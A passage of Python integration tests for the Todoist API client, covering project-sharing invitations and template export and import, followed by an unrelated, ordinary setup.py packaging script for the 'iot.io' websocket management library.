api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation1 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation1 is not None
assert invitation1['project_name'] == project1['name']
assert invitation1['from_user']['email'] == api.state['user']['email']
api2.invitations.accept(invitation1['id'],
invitation1['invitation_secret'])
response2 = api2.commit()
assert api2.state['user']['id'] in \
[p['user_id'] for p in api2.state['collaborator_states']]
api.sync()
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_share_reject(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation2 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation2 is not None
assert invitation2['project_name'] == project1['name']
assert invitation2['from_user']['email'] == api.state['user']['email']
api2.invitations.reject(invitation2['id'],
invitation2['invitation_secret'])
response2 = api2.commit()
assert len(response2['projects']) == 0
assert len(response2['collaborator_states']) == 0
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_share_delete(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation3 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation3 is not None
assert invitation3['project_name'] == project1['name']
assert invitation3['from_user']['email'] == api.state['user']['email']
api.invitations.delete(invitation3['id'])
api.commit()
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_templates(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
project2 = api.projects.add('Project2')
api.commit()
item1 = api.items.add('Item1', project_id=project1['id'])
api.commit()
template = api.templates.export_as_file(project1['id'])
assert 'task,Item1,4,1' in template
with io.open('/tmp/example.csv', 'w', encoding='utf-8') as example:
example.write(template)
result = api.templates.import_into_project(project1['id'],
'/tmp/example.csv')
assert result == {'status': u'ok'}
item1.delete()
api.commit()
project1.delete()
api.commit()
project2.delete()
api.commit()
| 2.15625 | 2 |
setup.py | dylancrockett/iot.io | 0 | 6899 | from setuptools import setup
import iotio
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="iot.io",
version=iotio.__version__,
packages=["iotio"],
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
description="A management API for connecting and managing Clients via websocket connections.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/dylancrockett/iot.io",
project_urls={
"Documentation": "https://iotio.readthedocs.io/",
"Source Code": "https://github.com/dylancrockett/iot.io"
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
],
install_requires=[
'gevent',
'gevent-websocket',
'flask',
'flask-sockets',
],
python_requires='>=3.7'
)
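# Once published under this name, the package would typically be installed with
# `pip install iot.io` (requires Python 3.7+ per python_requires above).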
| 1.539063 | 2 |